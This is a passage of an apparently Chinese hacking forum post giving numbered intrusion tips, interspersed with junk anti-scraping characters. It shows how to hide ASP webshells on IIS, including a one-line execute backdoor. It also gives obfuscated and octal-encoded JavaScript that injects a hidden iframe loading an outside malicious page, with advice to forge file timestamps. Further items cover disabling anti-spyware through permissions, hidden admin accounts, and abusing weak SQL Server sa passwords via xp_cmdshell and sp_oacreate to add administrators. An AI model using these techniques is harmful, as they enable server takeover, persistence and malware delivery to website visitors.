/ J$ p) p. ^- K! _- a9 C
53、隐藏ASP后门的两种方法
6 g- Y' U7 J; B2 @; \/ G6 f1、建立非标准目录:mkdir images..\: i% a! ]9 J: J1 e5 c
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
3 f ~% |* f( K/ l7 F通过web访问ASP木马:http://ip/images../news.asp?action=login9 X& @3 W9 P- M8 U( v" A0 `) d
如何删除非标准目录:rmdir images..\ /s3 v+ Q5 w% ]) E& z
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:' q& w$ N3 y# X
mkdir programme.asp9 l$ g4 \& N, n+ ^
新建1.txt文件内容:<!--#include file=”12.jpg”-->
6 f; m- ~3 x) A6 w新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件4 ?" \3 T( e4 n% f
attrib +H +S programme.asp
8 k+ x5 A" [2 ?# C& m通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
$ \% f9 }, b/ u* u( \# n3 N' n, P) X+ c7 S8 q) G" |9 c
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
, C, g( [/ Y" G; r- Y- P" q% o然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。% H1 S1 d* M2 G( Q. n
0 K. M# V5 @2 W8 l2 E55、JS隐蔽挂马
- v, A( p7 r E1.
2 c5 w/ ^ t9 r1 avar tr4c3="<iframe src=ht";
& {. \/ g5 U) F* dtr4c3 = tr4c3+"tp:/";
1 B T7 x, g4 R" U% h+ X2 w3 v2 wtr4c3 = tr4c3+"/ww";5 o6 i1 m: k# T ]
tr4c3 = tr4c3+"w.tr4";" b6 O: ^4 c4 H' e( k, y
tr4c3 = tr4c3+"c3.com/inc/m";
7 A2 E: Y" F1 h( Ltr4c3 = tr4c3+"m.htm style="display:none"></i";
' Q8 L$ T9 u3 t; R8 j. vtr4c3 =tr4c3+"frame>'";% O- h6 X0 N% l1 f
document.write(tr4c3);+ N% C) R! \! R8 Q; D' v/ K E: m
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。3 J+ _6 w; y% d, X# y" E
) H) W5 \2 E" m2.
. G0 u6 N6 _' U6 p/ j转换进制,然后用EVAL执行。如
: A, v! j: ~7 m. Feval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
) ]6 b I, Z+ Q c% I不过这个有点显眼。
$ ?( S9 F+ R( \2 z4 o1 k/ [! [3.
; m' C6 O h: q7 u* Xdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');+ T' h. p$ L, R9 n3 x
最后一点,别忘了把文件的时间也修改下。
+ k$ ]- e" D9 c5 F1 y, ]2 c, ?9 u. G9 e" g$ Q' d
56.3389终端入侵常用DOS命令
Y3 n7 @* H) o3 ?taskkill taskkill /PID 1248 /t) j# {" X/ K, Z; b' I$ o
. M0 x( X7 k+ _# S0 B* m; o
tasklist 查进程
5 a4 f$ m0 O$ z) M# Z! f. s2 q
& R1 t4 N- \) `* `) e7 G) Pcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限! F& i% |" X8 W9 x; S6 F
iisreset /reboot: S+ k# l) x/ l' M/ S% G% T2 i6 d
tsshutdn /reboot /delay:1 重起服务器
' D; M9 v! O1 a! J; h" J7 q3 D3 h( |3 X9 \, O o+ O8 ^
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ W9 E2 J) \1 l( u N
( e% j1 _9 y, I6 ?( [query user 查看当前终端用户在线情况
' U$ D* y! Q/ j
7 F" B2 N8 K4 @1 Z- E3 S; z+ b& Q要显示有关所有会话使用的进程的信息,请键入:query process *
6 J! h- p% q: r: r
3 o/ ^# y4 W5 ^1 S要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
$ V1 r5 R( E, t! {1 v/ b: Y
P: S) j1 W F: W8 ]8 _, K* N. u要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
' ~( q+ q( c# I
* `+ Y' ~8 P" N" s2 I \要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
) j! P! ]7 r0 J5 e! o+ K4 M2 K' Q
- B+ W" s! W$ o f* @0 h命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启4 T# m1 g R" B5 j+ `% Q- H
" _) N' I5 n$ ^
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统: ^5 J: M( x$ U# \
2 n, w7 m+ t% V; o; E. ~0 B( G
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
8 _5 a7 q# R7 L+ k1 x" ^6 \) V0 G1 W- f
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 k8 [4 p E$ { W( ]8 X5 h
- l7 j4 }( O5 T: t56、在地址栏或按Ctrl+O,输入:; m' Q2 t! G$ q( g) ^: c, ?
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;2 X0 _: `' x# S/ g
& V; P ^& L+ ^& S% {
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
1 p, g' ^3 Y. u0 _% w+ D2 l5 S% u, e. y) V
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ I9 i. Q1 m( o. _- w5 [5 z6 u* Y
用net localgroup administrators是可以看到管理组下,加了$的用户的。
* X3 m; X: }5 l" ^: _
: _% ]0 F; a: U; J+ P! q! t58、 sa弱口令相关命令
5 A, m$ D3 H& @2 X, Q5 A
% Y2 P/ J# j6 W- q( B; h7 P一.更改sa口令方法:
/ u9 W0 l- U. ]+ P2 d& \* o用sql综合利用工具连接后,执行命令:
: P* i$ r ~1 _; a; b' x8 Q$ Pexec sp_password NULL,'20001001','sa'9 K5 s/ E) ?% R4 K
(提示:慎用!)
) |* F' q `0 w L5 x: t$ ~- I, i) k3 d
二.简单修补sa弱口令.# E. N) D: ?* K1 c8 B0 ~
7 |6 y# V* T' }8 }. b. R! v5 O7 h( K方法1:查询分离器连接后执行:
5 Y: F) ~& e% b) m _$ p# g5 Tif exists (select * from
9 H/ {$ W3 s- O: Bdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and0 b( i* l$ r. v: Z
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
3 E) `# W: ^& o; Q; u
/ O. R' o* R8 A) xexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
0 Y* ^' W7 S5 L+ k$ U
+ i y( X4 \' m$ UGO
7 y0 V ` x7 R. c; a! C1 i# k( B; O! Z
然后按F5键命令执行完毕) ]; ^4 `" g! g$ X
6 p; p3 A: D. y/ T8 x( }4 t方法2:查询分离器连接后
7 {: z2 H0 K2 p) g第一步执行:use master
- M+ D, t3 G' P' F+ K第二步执行:sp_dropextendedproc 'xp_cmdshell'
" G- N T6 N0 i( G. \7 q然后按F5键命令执行完毕
& G' o% O7 \! |% L! ]3 `) r, b: N$ E& @9 p; h$ y9 V
2 i9 c3 O+ M M. f K
三.常见情况恢复执行xp_cmdshell.
5 R7 P5 p. O1 b v$ Z, g" v5 x% C( Z* V
* P+ R( r3 h7 i4 |
1 未能找到存储过程'master..xpcmdshell'.
4 u2 O7 s1 @% M& y" V# A: X 恢复方法:查询分离器连接后,( Y, x4 Y5 R" f5 n
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int5 v* N8 Y- o* F6 R' F
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'* y: n" o. k7 n! ~% e* {
然后按F5键命令执行完毕
$ r* ^7 L' Z2 @- W% x; J& Q+ l' F y9 v( _# I
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)' U7 G; b I4 u& n
恢复方法:查询分离器连接后,% [9 f4 _. q1 ?$ r( J6 s3 {" ?6 {' X
第一步执行:sp_dropextendedproc "xp_cmdshell"* Y) q! ^" y) [
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'6 P1 N$ A$ `; C1 ~4 y! A4 g4 Z, R% |0 |
然后按F5键命令执行完毕
2 _# I8 ~8 @) v- }$ C: L
7 ?& r" P! y S- O0 H3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
3 c2 [2 o- i0 T5 A( h) T6 I; e8 Z恢复方法:查询分离器连接后,
' U& S; L0 \! }& {. r: G( t- l) R第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
x6 g( q s, j5 m* ]第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
$ K$ T- e$ l/ K然后按F5键命令执行完毕
2 I2 e7 R3 P2 z# z' V( @3 m
' o5 `) J# m! P四.终极方法.
- g( g4 H3 t! S; \如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
) q" n4 k# C, J: |9 z7 T9 T查询分离器连接后,
- z4 n9 u# k- T2000servser系统:
# A: j3 @* \) v* A# X8 N# ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
. O+ r. s$ O' Y P9 B K7 @4 ]& i% Z0 l. w$ b8 l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" N% m6 K3 _0 I8 x
( ]- d+ N6 i6 Y+ pxp或2003server系统:
) Q: c! `6 ?* m6 c$ b; b" a
2 g2 j; t) @5 C2 F5 o" o; Cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'8 s' G J% m N; O* M
3 k$ T6 K% o1 x4 L& V9 o7 T+ cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'- @6 G; ^3 V3 \. O- r' v
|
发表于 2012-9-15 14:13:15
收藏
支持
反对